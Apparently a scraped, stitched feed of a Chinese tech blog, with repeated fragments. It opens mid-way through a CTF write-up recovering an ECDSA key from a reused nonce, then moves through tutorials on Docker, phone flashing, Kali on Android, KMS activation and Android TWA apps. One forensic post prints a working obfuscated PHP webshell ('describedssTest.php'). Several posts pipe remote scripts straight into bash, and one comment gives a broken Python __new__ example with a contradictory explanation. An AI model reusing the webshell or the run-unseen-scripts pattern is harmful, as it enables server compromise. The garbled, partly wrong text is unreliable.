k = (n2 - n1 + p) % p * gmpy2.invert((m2 - m1 + p) % p, p) % p
m3 = (k * k % p - m1 - m2 + p * 2) % p
n3 = (k * (m1 - m3) % p - n1 + p) % p
return (int(m3),int(n3))
通过这几段有关椭圆函数的运算可以推断出k是使用椭圆曲线数字签名算法(ECDSA)加密的。可参考一文看懂椭圆曲线签名算法 - 知乎进行求解k值。
k = (z1 - z2) * gmpy2.invert(s1 - s2, n) % n
dA值根据之前的分析,可以逆向得到dA.
dA = (s1 * k - z1) * gmpy2.invert(r1, n) % n
victory_encrypted_flag阅读“步骤二”可得victory_encrypted_flag的逆向代码。
key = sha256(long_to_bytes(dA)).digest()
cipher = AES.new(key, AES.MODE_CBC, iv)
victory_encrypted_flag = unpad(cipher.decrypt(encrypted_flag), AES.block_size).decode('utf-8')
运行后得到输出值为SDSRDO{xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx},这并不是正确flag格式。
flag仔细阅读代码,可以发现victory_encrypted_flag由victory_encrypt()函数得到。
def victory_encrypt(plaintext, key):
key = key.upper()
key_length = len(key)
plaintext = plaintext.upper()
ciphertext = ''
for i, char in enumerate(plaintext):
if char.isalpha():
shift = ord(key[i % key_length]) - ord('A')
encrypted_char = chr((ord(char) - ord('A') + shift) % 26 + ord('A'))
ciphertext += encrypted_char
else:
ciphertext += char
return ciphertext
victory_key = "WANGDINGCUP"
victory_encrypted_flag = victory_encrypt(flag, victory_key)
我们反推victory_encrypt()得到victory_decrypt()
def victory_decrypt(ciphertext, key):
key = key. upper()
key_length = len(key)
ciphertext = ciphertext. upper()
plaintext = ''
for i, char in enumerate(ciphertext):
if char.isalpha():
shift = ord(key[i % key_length]) - ord('A')
decrypted_char = chr((ord(char) - ord('A') - shift +26)% 26 + ord('A'))
plaintext += decrypted_char
else:
plaintext += char
return plaintext
通过victory_decrypt()可以得到大写的FLAG,将其转换成小写flag即可。
import binascii
from hashlib import sha256
from Crypto.Cipher import AES
from Crypto.Util.number import long_to_bytes
from Crypto.Util.Padding import unpad
import gmpy2
n = 0xfffffffffffffffffffffffffffffffebaaedce6af48a03bbfd25e8cd0364141
r1 = 86806104739558095745988469033305523200538774705708894815836887970976487278764
r2 = 86806104739558095745988469033305523200538774705708894815836887970976487278764
s1 = 93400851884262731807098055393482657423555590196362184363643455285862566867372
s2 = 58741027521216057788923508334695668250013849866589902683641825341545919891746
z1 = 47591695289461307212638536234394543297527537576682980326526736956079807805586
z2 = 97911075901954715147720917205165523174582665086645698292621371632896283314804
k = (z1 - z2) * gmpy2.invert(s1 - s2, n) % n
dA = (s1 * k - z1) * gmpy2.invert(r1, n) % n
encrypted_flag_hex = u'86cd24e2914c0c4d9b87bea34005a98bd8587d14cae71909b917679d3328304e7915e6ba4cad1096faa4a85bc52f8056d3f21ef09516be8a5160f1b338a6b936'
encrypted_flag_bytes = binascii.unhexlify(encrypted_flag_hex)
iv = encrypted_flag_bytes[:AES.block_size]
encrypted_flag = encrypted_flag_bytes[AES.block_size:]
key = sha256(long_to_bytes(dA)).digest()
cipher = AES.new(key, AES.MODE_CBC, iv)
victory_encrypted_flag = unpad(cipher.decrypt(encrypted_flag), AES.block_size).decode('utf-8')
def victory_decrypt(ciphertext, key):
key = key. upper()
key_length = len(key)
ciphertext = ciphertext. upper()
plaintext = ''
for i, char in enumerate(ciphertext):
if char.isalpha():
shift = ord(key[i % key_length]) - ord('A')
decrypted_char = chr((ord(char) - ord('A') - shift +26)% 26 + ord('A'))
plaintext += decrypted_char
else:
plaintext += char
return plaintext
victory_key = "WANGDINGCUP"
flag = victory_decrypt(victory_encrypted_flag, victory_key)
print(flag)
打开了一个 Docker 容器,该容器消耗系统资源超过所拥有的系统资源本身,导致机器卡死。该容器设置了always启动策略,每次重启都会自动启动容器。无法连接到 SSH,也无法打开 Web 管理面板,只能通过云服务商的 VNC 应急连接。
将 Docker 服务完全停止,然后禁用或者删除出现问题的 Dockers 容器,最后重启 Docker 服务恢复业务。
打开了一个 Docker 容器,该容器消耗系统资源超过所拥有的系统资源本身,导致机器卡死。该容器设置了always启动策略,每次重启都会自动启动容器。无法连接到 SSH,也无法打开 Web 管理面板,只能通过云服务商的 VNC 应急连接。
将 Docker 服务完全停止,然后禁用或者删除出现问题的 Dockers 容器,最后重启 Docker 服务恢复业务。
systemctl stop docker
systemctl disable docker
/var/lib/docker/containers/目录,查看目录。config.v2.json或者hostconfig.json来判断容器。rm -rf [容器id] 删除容器。hostconfig.json,并将RestartPolicy的name改为never。然后打开config.v2.json,将State的Running参数改为False。systemctl enable docker
systemctl start docker
systemctl status docker
操作服务器环境之前要先打快照!!!
]]>wwwroot的备份文件,我们可以将文件下载。
下载任意一个备份文件,解压文件。
wwwroot的备份文件,我们可以将文件下载。
下载任意一个备份文件,解压文件。
找到特征最明显的文件(其他文件开头为大写字母,该文件开头为小写字母) "describedssTest.php ",将其代码格式化后可得
<?php error_reporting(0);
header('Content-type: text/html; charset=utf-8');
$p8 = '3b7430adaed18facca7b799229138b7b';
$a8 = 'TURNeU9UWTBOelUwTmprd05UUTVOR0ZLV1ZwdU9XSkZORmh2WnpoS1RrNW1jRTFrTkdjOVBRPT0=';
$d8 = 'TURNeU9UWTBOelUwTmprd05UUTVOR012V1c5cVJXNXBkWEJyZDFsemJsQlpNMmRITjNaYWVFVnFPVWRqVnpoWlUyNXZNbmhDU21jd2RHTkxRazF2U1hvMU9FNUNWM2RNUjFWYVJuVnBiV3czUlVwUldFMTFhakp2VjJKS1NIVlJUMU5UYjNoSWExUk5hMlZXY21OdlRuaHVRMjlsVkV4aEwzbGpQUT09';
$v8 = '0329647546905494';
function e($D, $K)
{
$cipher = 'aes-128-cbc';
$encrypted = openssl_encrypt($D, $cipher, $K, 0, $GLOBALS['v8']);
$result = base64_encode($GLOBALS['v8'] . $encrypted);
$result = base64_encode($result);
return $result;
}
function d($D, $K)
{
$cipher = 'aes-128-cbc';
$decodedData = base64_decode(base64_decode($D));
$encryptedData = substr($decodedData, openssl_cipher_iv_length($cipher));
$decrypted = openssl_decrypt($encryptedData, $cipher, $K, 0, $GLOBALS['v8']);
return $decrypted;
}
$a8 = trim(d($a8, $p8));
ob_start();
$a8(trim(d($d8, $p8)));
$O = ob_get_contents();
ob_end_clean();
echo e($O, $p8);
打开 Python 官网 https://www.python.org/
点击 Downloads ,选择你自己系统版本对应的安装包。一般情况下,直接点击最大的下载按钮即可。
]]>打开 Python 官网 https://www.python.org/
点击 Downloads ,选择你自己系统版本对应的安装包。一般情况下,直接点击最大的下载按钮即可。
关注微信公众号 heStudio Community回复 violet_9008 获取下载链接。
下载搞机助手(可以从上方文件中获取)并安装。手机按音量减键和电源键进入 Fastboot 模式,
打开搞机助手,点击进入 9008 模式
等待手机黑屏之后,打开设备管理器,看见 COM 端口说明已进入 9008 模式。
在扩展功能中找到 9008 深度刷机
分别选择镜像根目录下的images/prog_emmc_firehose_Sm6150_ddr.elf, images/rawprogram0.xml, images/patch0.xml, 点击开始刷入。
关注微信公众号 heStudio Community回复 violet_9008 获取下载链接。
下载搞机助手(可以从上方文件中获取)并安装。手机按音量减键和电源键进入 Fastboot 模式,
打开搞机助手,点击进入 9008 模式
等待手机黑屏之后,打开设备管理器,看见 COM 端口说明已进入 9008 模式。
在扩展功能中找到 9008 深度刷机
分别选择镜像根目录下的images/prog_emmc_firehose_Sm6150_ddr.elf, images/rawprogram0.xml, images/patch0.xml, 点击开始刷入。
MiUsbDriver.exe如果你将设备接入 USB3 接口,请分别用管理员身份运行以下命令
]]>MiUsbDriver.exe如果你将设备接入 USB3 接口,请分别用管理员身份运行以下命令
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\usbflags\18D1D00D0100" /v "osvc" /t REG_BINARY /d "0000" /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\usbflags\18D1D00D0100" /v "SkipContainerIdQuery" /t REG_BINARY /d "01000000" /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\usbflags\18D1D00D0100" /v "SkipBOSDescriptorQuery" /t REG_BINARY /d "01000000" /f
然后重新连接。
]]>该脚本仅能切换系统语言,并不能切换工具语言。如果使用的工具并不支持中文,则仍然会以英文形式显示。该脚本会重置 startkali 文件,如果你此前修改过 startkali 文件,请备份。
该脚本仅能切换系统语言,并不能切换工具语言。如果使用的工具并不支持中文,则仍然会以英文形式显示。该脚本会重置 startkali 文件,如果你此前修改过 startkali 文件,请备份。
bash -c "$(curl https://res.hestudio.net/kali_for_android/patch/ka_install_patch_240809)"
这个项目是一个 uni-app 项目,使用的是 vue3. 我将源码下载后进行了测试,在微信小程序端可以正常运行,但是在抖音小程序端报错如下。
这个项目是一个 uni-app 项目,使用的是 vue3. 我将源码下载后进行了测试,在微信小程序端可以正常运行,但是在抖音小程序端报错如下。
这个项目有多个问题。首先,左侧的框提示“const variable was declared”。我们查看该部分对应的代码。
这里使用的是 const,const 声明的是常量(不可变)。小程序试图二次写入 formData 时失败了,所以报错。我们将 const 更换成 let。
修改后,小程序预览没有刚才的红色报错,但是仍然无法进入,停留在加载页面。打开调试工具,仍然显示报错。该问题为第三方包 lodash 导致的,安装 lodash-es,并将 lodash 依赖替换为 lodash-es
修改完成后,模拟器上已经正常运行了。但是重启项目后,hbuilderx 报错如下
该报错对应着 uni-read-pages-v3.js 文件,我们将这个文件改回 commonjs 后再次编译运行。可以正常运行。
]]>
回复
你好,我们测试时并未复现该问题。根据报错信息,可能是你在联网获取信息时候出现了网络波动导致。建议再次尝试。
回复
你好,我们测试时并未复现该问题。根据报错信息,可能是你在联网获取信息时候出现了网络波动导致。建议再次尝试。
回复
8.1 并不支持某些特性,建议升级系统版本或者更换设备
回复
回复
没有这个能力
回复
不要用 googleplay 版本的,用 github 版本的
回复
额,su 进入 root 是输入 root 用户的密码,sudo su 进入 root 是输入管理员(也就是 kali)的密码
群主吊毛 回复
回复
回复
Android14 用户请等待 v4 脚本
回复
回复
丢日志的时候麻烦不要翻译,我们看得懂英文
回复
@封灵 自己玩去,想玩什么玩什么
回复
谢谢 ❤️❤️
众所又周知,手机端和平板端可以同时登录。手机端和平板端是同一个安装包。但是由于苹果的封闭性,我们很难将 iPhone 的属性换成 iPad,所以至少需要一台安卓手机来伪装成平板端。注意:我们是利用手机端和平板端可以同时登录这个特性,所以你不可以同时在备用机和平板上登录。
]]>众所又周知,手机端和平板端可以同时登录。手机端和平板端是同一个安装包。但是由于苹果的封闭性,我们很难将 iPhone 的属性换成 iPad,所以至少需要一台安卓手机来伪装成平板端。注意:我们是利用手机端和平板端可以同时登录这个特性,所以你不可以同时在备用机和平板上登录。
我们有 Root 和非 Root 两种方案,两种方案各有各的优缺点。我个人倾向于 Root 方案,因为 Root 方案的维护成本低。但是如果你由于某些原因无法 Root 手机,也可以参考非 Root 方案。
| | Root 方案 | 非 Root 方案 | |
]]>由于需要修补 Boot,所以必须解锁 BootLoader,解锁 BootLoader 后才能刷入第三方 Recovery。小米手机可以在官网解锁 BootLoader 锁,OPPO 手机部分机型可以使用深度测试解锁。其他品牌手机另解。
打开你的系统终端,cd [ADB工具文件夹],然后输入以下命令:
Windows Powershell / Linux bash / MacOS zsh
./fastboot flash recovery [recovery.img路径]
然后重启手机,按对应按键进入 Recovery
将Magisk.apk改名为Magisk.zip,然后通过 Recovery 刷入。
在开机后如果没有发现你的手机桌面有 Magisk,你需要手动安装,然后修补 Boot(MIUI 经常这样),如果有 Magisk,点击后安装完整版,然后等待自动修补。
下面是手动修补 Boot 的教程,如果你的系统自动修补了 Boot,可以完结撒花了。
下载你的系统线刷包,然后解压文件,找到boot.img并提取到手机。
打开 Magisk,点击画红框的安装按钮,选择“安装到 Recovery”,单击下一步,然后选择“选择并修补一个文件”,选择文件,完成修补过程。
将修补后的 Boot 导入到电脑,通过 Fastboot 刷入。
./fastboot flash boot [修补后的boot.img路径]
我在老家的 WindowsXP 老古董上网时遇到了这个问题。我的手机连接到电脑,打开 USB 网络驱动时候并没有连接到网络。在设备管理器里,RNDIS 设备标着黄色三角号,也就是没有驱动。
我从网络中搜索 RNDIS 的驱动,但是无法安装上。这个驱动可以匹配其他的安卓手机,但是不能匹配小米手机。我下载了小米的 winusb 驱动,在 RNDIS 报错页面安装了这个驱动之后可以正常使用了。
首先,需要下载 winusb 驱动。
]]>我在老家的 WindowsXP 老古董上网时遇到了这个问题。我的手机连接到电脑,打开 USB 网络驱动时候并没有连接到网络。在设备管理器里,RNDIS 设备标着黄色三角号,也就是没有驱动。
我从网络中搜索 RNDIS 的驱动,但是无法安装上。这个驱动可以匹配其他的安卓手机,但是不能匹配小米手机。我下载了小米的 winusb 驱动,在 RNDIS 报错页面安装了这个驱动之后可以正常使用了。
]]>本期的网络配置背景同于前两期的描述( 详见https://www.hestudio.net/category/proxmox-ve/ ),这一期只是对网络配置的扩展,也就是安装软路由,实现网络配置的更多功能。
工欲善其事,必先利其器。我们如果想配置 OpenWrt,首先需要安装它。
]]>本期的网络配置背景同于前两期的描述( 详见https://www.hestudio.net/category/proxmox-ve/ ),这一期只是对网络配置的扩展,也就是安装软路由,实现网络配置的更多功能。
]]>我在安装 PVE 之后,将该硬盘移到其他机器上,由于硬件设施的变动,导致我们无法连接进入服务器。我们需要修改/etc/network/interfaces文件。
在 PVE 中,默认安装的文件编辑器是nano,我们使用nano编辑/etc/network/interfaces文件。
nano /etc/network/interfaces
我在安装 PVE 之后,将该硬盘移到其他机器上,由于硬件设施的变动,导致我们无法连接进入服务器。我们需要修改/etc/network/interfaces文件。
在 PVE 中,默认安装的文件编辑器是nano,我们使用nano编辑/etc/network/interfaces文件。
nano /etc/network/interfaces
Proxmox Virtual Environment,简称 Proxmox VE,是一款专为企业级应用场景设计的开源虚拟化管理平台,以其高度集成、易于使用和卓越的性能而备受赞誉。基于 Debian Linux 稳健的基础,Proxmox VE 提供了一个统一的解决方案来部署、管理和监控虚拟机(VMs)及轻量级容器(Containers),实现计算、网络和存储资源的高度整合与优化。以下是对 Proxmox VE 主要特性和优势的详细介绍:
]]>Proxmox Virtual Environment,简称 Proxmox VE,是一款专为企业级应用场景设计的开源虚拟化管理平台,以其高度集成、易于使用和卓越的性能而备受赞誉。基于 Debian Linux 稳健的基础,Proxmox VE 提供了一个统一的解决方案来部署、管理和监控虚拟机(VMs)及轻量级容器(Containers),实现计算、网络和存储资源的高度整合与优化。以下是对 Proxmox VE 主要特性和优势的详细介绍:
KVM(Kernel-based Virtual Machine):作为主流的硬件虚拟化技术,KVM 使 Proxmox VE 能够创建和运行全功能的虚拟机,充分利用硬件虚拟化支持(如 Intel VT 或 AMD-V),为每个 VM 提供接近裸金属的性能和隔离性。KVM VM 支持各种操作系统,包括 Windows、Linux 以及其他类 UNIX 系统。
LXC(Linux Containers):Proxmox VE 还支持基于 Linux 内核的容器技术,即 LXC。容器提供了轻量级的隔离环境,共享主机内核,适用于快速启动、低开销的应用场景,尤其适合运行相同或相似 Linux 发行版的服务或微服务架构。
Web 管理界面:
集群支持:
存储管理:
备份与恢复:
网络与安全:
模板与快照:
完全开源:
活跃社区与生态系统:
介绍部分由国产大模型“通义千问”自动生成。
我们首先进入 Proxmox VE 官网,找到Download按钮。
我们直接下载最新版本的 Proxmox VE 镜像。
在下载完成之后,你需要制作一个安装盘以用于在服务器上引导安装。这边推荐使用Refus.如果你使用 Vertoy,你仅仅只需要镜像放置在移动储存设备中。
在继续以下的内容,我们默认你已经制作启动盘和知晓你服务器的 BIOS 选择启动设备的按钮(如F12)。如果你并不知道这些,请先自行搜索或者咨询你的服务器硬件厂商。
在你启动后,你将看到以下界面:
这说明你已经成功启动了安装程序。按下Enter键,进入安装界面。等待一会,然后进行后面的安装进程。
Captive Portal的机制,用于检测 WiFi 网络认证是否正常。由于众所周知的原因,我们在中国大陆并无法访问谷歌的网络,这在某些情况下会导致一些问题,例如:在中国大陆使用一些类原生的 ROM 时,会提示Wifi连接正常,但无法访问互联网。
我们可以通过打开 USB 调试,并执行以下命令来修复这个问题。
adb shell settings put global captive_portal_http_url http://api.hestudio.net/generate_204
adb shell settings put global captive_portal_https_url https://api.hestudio.net/generate_204
Captive Portal的机制,用于检测 WiFi 网络认证是否正常。由于众所周知的原因,我们在中国大陆并无法访问谷歌的网络,这在某些情况下会导致一些问题,例如:在中国大陆使用一些类原生的 ROM 时,会提示Wifi连接正常,但无法访问互联网。
我们可以通过打开 USB 调试,并执行以下命令来修复这个问题。
adb shell settings put global captive_portal_http_url http://api.hestudio.net/generate_204
adb shell settings put global captive_portal_https_url https://api.hestudio.net/generate_204
ss
详细解释:
我们通过替换captive_portal_http_url和captive_portal_https_url的值,来修复这个问题。我们将captive_portal_http_url和captive_portal_https_url更换为我们自己的 API,当然你也可以更换成其他的服务。
# MIUI
adb shell settings put global captive_portal_http_url http://connect.rom.miui.com/generate_204
adb shell settings put global captive_portal_https_url https://connect.rom.miui.com/generate_204
正如上文所说,heStudio Authenticator 是一个媲美于 Microsoft Authenticator 的完全由我们开发的 MFA 令牌软件。不同于其他类似软件,我们随着v1.1.0的版本的推送同步带来了手表(Android)版本。我们利用手表的便携性,让你即使在未携带手机的情况下,也可以快速的通过随身佩戴的手表快速查看令牌。
正如上文所说,heStudio Authenticator 是一个媲美于 Microsoft Authenticator 的完全由我们开发的 MFA 令牌软件。不同于其他类似软件,我们随着v1.1.0的版本的推送同步带来了手表(Android)版本。我们利用手表的便携性,让你即使在未携带手机的情况下,也可以快速的通过随身佩戴的手表快速查看令牌。
我们预计在 2025 年初期重构该项目并发布面向大众的 heStudio Authenticator 2.x 版本。此次会带给大家更好的跨平台体验,敬请期待!!
但是,一些软件仅在 Microsoft Store 提供,我个人使用的就是 LTSC 的系统,如果要下载 Minecraft 的话就需要 Microsoft Store。Microsoft Store 提供了更严格的应用审核机制,可以保证安装的应用不会再你的电脑中乱搞。
下面介绍如何在 LTSC 版本的 Windows 上安装 Microsoft Store
]]>但是,一些软件仅在 Microsoft Store 提供,我个人使用的就是 LTSC 的系统,如果要下载 Minecraft 的话就需要 Microsoft Store。Microsoft Store 提供了更严格的应用审核机制,可以保证安装的应用不会再你的电脑中乱搞。
]]>
failed to execute child process 'dbus-launch'
failed to execute child process 'dbus-launch'
在我咨询Kali Linux 社区后,得到这么一个解决方案
sudo apt-get update
sudo apt install dbus-x11
这里以 Kali Linux 为例,其他 Linux 发行版请选择对应的系统内置的等宽字体
我们依次打开 设置 -> 外观 -> 字体
]]>这里以 Kali Linux 为例,其他 Linux 发行版请选择对应的系统内置的等宽字体
我们依次打开 设置 -> 外观 -> 字体
这里我们可以发现,Kali Linux 默认等宽字体系列是'Fira Code',后续我们需要在 VSCode 内将字体改为'Fira Code'
Chrome 不支持 Linux-arm64,这时候可以安装 Chromium.
apt install chromium
Chrome 不支持 Linux-arm64,这时候可以安装 Chromium.
apt install chromium
部分 root 用户在安装后无法打开,是因为 Chromium 默认不允许在 root 用户状态下运行,可以通过一下方法修改。
vim /etc/chromium.d/default-flags
打开后在最后一行加上
export CHROMIUM_FLAGS="$CHROMIUM_FLAGS --password-store=detect --no-sandbox --user-data-dir"
最后保存,然后就可以在 root 下使用了。
]]>grep: /proc/version: 权限不够
grep: /proc/version: 权限不够
You are trying to start Visual Studio Code as a super user which isn't recommended. If this was intended, please add the argument --no-sandbox and specify an alternate user data directory using the --user-data-dir argument.
grep: /proc/version: 权限不够
grep: /proc/version: 权限不够
You are trying to start Visual Studio Code as a super user which isn't recommended. If this was intended, please add the argument --no-sandbox and specify an alternate user data directory using the --user-data-dir argument.
VSCode 默认不支持 root 用户启动,如果需要使用 root 用户启动,需在启动命令中加上--no-sandbox
/usr/share/code/code --no-sandbox --unity-launch
阅读前提示
本文仅适合个人用户,商业用户使用该程序可能会面临法律风险!!!
建议有经济能力的读者支持正版。
知周所众,Windows 和 Office 不是免费软件。如果是新购买的品牌机,则应该预装有正版的 Windows 家庭版,部分用户还附赠 Office。但是,我相信我的读者一大部分用的是自己组装的电脑。
]]>像我一样的穷*用户应该有不少。
阅读前提示
本文仅适合个人用户,商业用户使用该程序可能会面临法律风险!!!
建议有经济能力的读者支持正版。
知周所众,Windows 和 Office 不是免费软件。如果是新购买的品牌机,则应该预装有正版的 Windows 家庭版,部分用户还附赠 Office。但是,我相信我的读者一大部分用的是自己组装的电脑。
像我一样的穷*用户应该有不少。
像我这样的经常赶稿的忠实的巨硬用户虽说讨厌巨硬,但是也不能不用啊!!
(软件仅支持 windows,臣不得不用啊!!!)
然后再问一下,你们在遇到这种憋屈的情况都是怎么处理的??评论区见。
很想支持正版 Windows 和 Office,但是经济实力不允许的个人用户看过来。
对于这种不得不用的软件,我们肯定得想办法。对于网上的 kms 工具,它们需要我们的管理员权限。有的带自动续期的(kms 激活每 180 天验证一次)的又需要常驻后台。这在降低设备安全性(指不定给你塞什么东西 了)的前提下又影响设备性能,非常不划算。如果使用其他的 kms 服务器,又怕突然停服跑路。
有服务器的我们可以自己搭建一个 kms 服务器(免费的),这种自己的东西才用的放心。当然没有服务器可以用 linux 挂着用。
这里用到全球最大同性交友网站 Github 的一个开源项目 vlmcsd 项目地址是:https://github.com/Wind4/vlmcsd
为了保证我们服务器的稳定运行,我们将在 Docker 里运行这个项目。vlmcsd 项目的 Docker 仓库在https://github.com/Wind4/vlmcsd-docker
官网给了我们运行的命令,我们跟着它一起完成。
]]>
暂无
bash -c "$(curl https://res.hestudio.net/kali_for_android/patch/ka_install_patch_230608)"
之前安装过补丁的或者已经安装其他 vnc 的用户不要安装。
wget https://res.hestudio.net/kali_for_android/patch/ka_install_patch_230603 && bash ka_install_patch_230603
之前安装过补丁的或者已经安装其他 vnc 的用户不要安装。
wget https://res.hestudio.net/kali_for_android/patch/ka_install_patch_230603 && bash ka_install_patch_230603
[Process completed (signal 9) - press Enter],这是因为 Android 12 的 PhantomProcesskiller 限制了应用的子进程,最大允许应用有 32 个子进程。
[Process completed (signal 9) - press Enter],这是因为 Android 12 的 PhantomProcesskiller 限制了应用的子进程,最大允许应用有 32 个子进程。
这里以 ColorOS 12.1 为例(其他系统操作略有出入)
]]>termux-x11 是 Termux 的一个图形化项目,官方是这么介绍的。
A Termux add-on app providing Android frontend for Xwayland.
termux-x11 是 Termux 的一个图形化项目,官方是这么介绍的。
A Termux add-on app providing Android frontend for Xwayland.
5900+X作为版本号的。在重启后会继续向下一位分配版本号,这就意味着我们会经常修改 vnc 显示器的端口号。如果我们在运行的时候指定一个端口,那么实际上这个端口就固定了。
vncserver :1
5900+X作为版本号的。在重启后会继续向下一位分配版本号,这就意味着我们会经常修改 vnc 显示器的端口号。如果我们在运行的时候指定一个端口,那么实际上这个端口就固定了。
vncserver :1
在这种情况下 vnc 服务就会在5901端口运行。如果你想要在其他端口运行,那么可以将 1 改成其他数值。
如果需要固定一个简便的方法,那么我们可以尝试创建一个脚本并通过脚本快速通过固定的端口启动。
echo "vncserver :1" >> /usr/share/vncserver-start
chmod +x /usr/share/vncserver-shart
其中:1应当改为你需要的数值,vncserver-start应当改为你想要的脚本名称(需要是非中文或特殊字符且不要和系统原有指令冲突)。然后以后可以通过脚本快速通过固定端口启动。
回复
酷
回复
酷
回复
UNetbootin
我的回复
被调用以创建一个新的 cls 类的实例。new() 是一个静态方法 (特殊情况下,所以你不需要把它声明为静态方法),它把请求实例的类作为它的第一个参数。其余的参数是传递给对象构造函数表达式的参数(对类的调用)。new() 的返回值应该是新的对象实例(通常是 cls 的一个实例)。
典型的实现是通过调用超类的 new() 方法来创建一个新的类的实例,使用 super().new(cls[, ...]) 并带有适当的参数,然后在返回之前对新创建的实例进行必要的修改。
如果 new() 在对象构造过程中被调用,并且返回 cls 的一个实例,那么新实例的 init() 方法将被调用,就像 init(self[, ...]) ,其中 self 是新实例,其余参数与传递给对象构造函数的参数相同。
如果 new() 没有返回 cls 的一个实例,那么新实例的 init() 方法将不会被调用。
new() 主要是为了允许不可变类型的子类 (像 int, str, 或 tuple) 定制实例的创建。它也通常在自定义元类中被重写,以便自定义类的创建。
翻译自 Python Docs
@yms 的回复
@404 Not Found 在 Python 中,不可变类型(如整数、字符串、元组等)的实例在创建后是无法修改的。这是因为 Python 的实现方式,它们的值被存储在对象中,并且对象的标识符在创建后不能更改。
当一个类继承一个不可变类型时,它的实例也应该是不可变的。因此,如果不重新定义 __new__ 方法,那么这个类继承的不可变类型的 __new__ 方法会返回一个不可变的实例,而这个实例无法修改。
为了解决这个问题,我们可以通过重新定义 __new__ 方法来创建一个可变的实例。在 __new__ 方法中,我们可以调用父类的 __new__ 方法来创建一个不可变的实例,然后将其转换为可变类型的实例并返回。
以下是一个简单的例子,演示了如何继承 Python 中的不可变类型并重新定义 __new__ 方法来创建可变实例:
class MutableTuple(tuple):
def __new__(cls, *args):
obj = super().__new__(cls, args)
obj = list(obj)
return obj
t = MutableTuple(1, 2, 3)
t.append(4)
print(t) # 输出 [1, 2, 3, 4]
在这个例子中,我们创建了一个 MutableTuple 类,它继承自不可变类型 tuple。在 __new__ 方法中,我们先调用了父类 tuple 的 __new__ 方法来创建一个不可变的实例 obj,然后将其转换为一个可变的列表,并返回这个列表。这样,我们就可以使用 MutableTuple 类来创建可变的元组了。
需要注意的是,虽然这种方法可以让我们创建可变的实例,但这些实例仍然具有不可变类型的特性,即一旦创建后,它们的值就不能被修改。因此,在继承不可变类型时,我们仍然需要遵循不可变类型的规则来使用它们。
回复
@AE86 我又不知道你下载哪里了,不会自己看吗,自己在这里问问题不了解一点基本知识吗,这种 Linux 基础百度都能找到的,在群里发牢骚不是咨询问题的好方法,尤其是这种问题。
回复
termux 配合 mt 管理器
提示
运行端口在3000
提示
运行端口在3000
GET /getimage
GET /gettitle
返回参数:
| 参数 | 说明 | |
]]>但是在这之前,你需要准备一些东西,包括
本文参照 TWA 踩坑记-从零到一让你的博客变成 app 并上架商店 编写,由于版本更迭的原因,原教程的方法已经不再完全可用。感谢 Harbor Zeng 老师的思路。
]]>但是在这之前,你需要准备一些东西,包括
本文参照 TWA 踩坑记-从零到一让你的博客变成 app 并上架商店 编写,由于版本更迭的原因,原教程的方法已经不再完全可用。感谢 Harbor Zeng 老师的思路。
首先我们需要设置仓库。打开 project 目录的settings.gradle,然后参考这样设置。
pluginManagement {
repositories {
google()
mavenCentral()
gradlePluginPortal()
}
}
dependencyResolutionManagement {
repositoriesMode.set(RepositoriesMode.FAIL_ON_PROJECT_REPOS)
repositories {
google()
jcenter()
mavenCentral()
maven { url "https://jitpack.io" }
}
}
rootProject.name = "heStudio Blog" // 自己的软件名称
include ':app'
然后打开 app 目录的build.gradle,设置 Java8,这个库依赖 Java8
compileOptions {
sourceCompatibility JavaVersion.VERSION_1_8
targetCompatibility JavaVersion.VERSION_1_8
}
并添加这个库
dependencies {
implementation 'com.github.GoogleChrome.custom-tabs-client:customtabs:d08e93fce3'
}
在保存文件后 Android Studio 会提醒你是否 Sync,这时开始同步。
<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
xmlns:tools="http://schemas.android.com/tools">
<application
android:allowBackup="true"
android:dataExtractionRules="@xml/data_extraction_rules"
android:fullBackupContent="@xml/backup_rules"
android:icon="@mipmap/ic_launcher"
android:label="@string/app_name"
android:supportsRtl="true"
android:theme="@style/Theme.HeStudioBlog"
tools:targetApi="31" >
<meta-data
android:name="asset_statements"
android:resource="@string/asset_statements" />
<activity android:name="android.support.customtabs.trusted.LauncherActivity"
android:exported="true">
<!-- Edit android:value to change the url opened by the TWA -->
<meta-data
android:name="android.support.customtabs.trusted.DEFAULT_URL"
android:value="https://www.hestudio.net" />
<!-- This intent-filter adds the TWA to the Android Launcher -->
<intent-filter>
<action android:name="android.intent.action.MAIN" />
<category android:name="android.intent.category.LAUNCHER" />
</intent-filter>
<!--
This intent-filter allows the TWA to handle Intents to open
hestudio.net.
-->
<intent-filter android:autoVerify="true">
<action android:name="android.intent.action.VIEW" />
<category android:name="android.intent.category.DEFAULT" />
<category android:name="android.intent.category.BROWSABLE" />
<!-- Edit android:host to handle links to the target URL-->
<data
android:host="hestudio.net"
android:scheme="https" />
</intent-filter>
</activity>
</application>
</manifest>
把上面的网站地址和域名都换成你自己的。
我们需要将应用链接到网站以进一步取消地址栏。我们就需要分别设置网站验证 APP 和 APP 验证网站。
打开/app/src/main/res/values/strings.xml,插入以下代码
<resources>
<string name="app_name">heStudio Blog</string>
<string name="asset_statements">
[{
\"relation\": [\"delegate_permission/common.handle_all_urls\"],
\"target\": {
\"namespace\": \"web\",
\"site\": \"https://www.hestudio.net\"}
}]
</string>
</resources>
将 site 的网址改成自己的,然后再返回到AndfoidManifest.xml,在activity前面插入meta-data
<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
xmlns:tools="http://schemas.android.com/tools">
<application
android:allowBackup="true"
android:dataExtractionRules="@xml/data_extraction_rules"
android:fullBackupContent="@xml/backup_rules"
android:icon="@mipmap/ic_launcher"
android:label="@string/app_name"
android:supportsRtl="true"
android:theme="@style/Theme.HeStudioBlog"
tools:targetApi="31" >
<meta-data
android:name="asset_statements"
android:resource="@string/asset_statements" />
<activity android:name="android.support.customtabs.trusted.LauncherActivity"
android:exported="true">
<!-- Edit android:value to change the url opened by the TWA -->
<meta-data
android:name="android.support.customtabs.trusted.DEFAULT_URL"
android:value="https://www.hestudio.net" />
<!-- This intent-filter adds the TWA to the Android Launcher -->
<intent-filter>
<action android:name="android.intent.action.MAIN" />
<category android:name="android.intent.category.LAUNCHER" />
</intent-filter>
<!--
This intent-filter allows the TWA to handle Intents to open
hestudio.net.
-->
<intent-filter android:autoVerify="true">
<action android:name="android.intent.action.VIEW" />
<category android:name="android.intent.category.DEFAULT" />
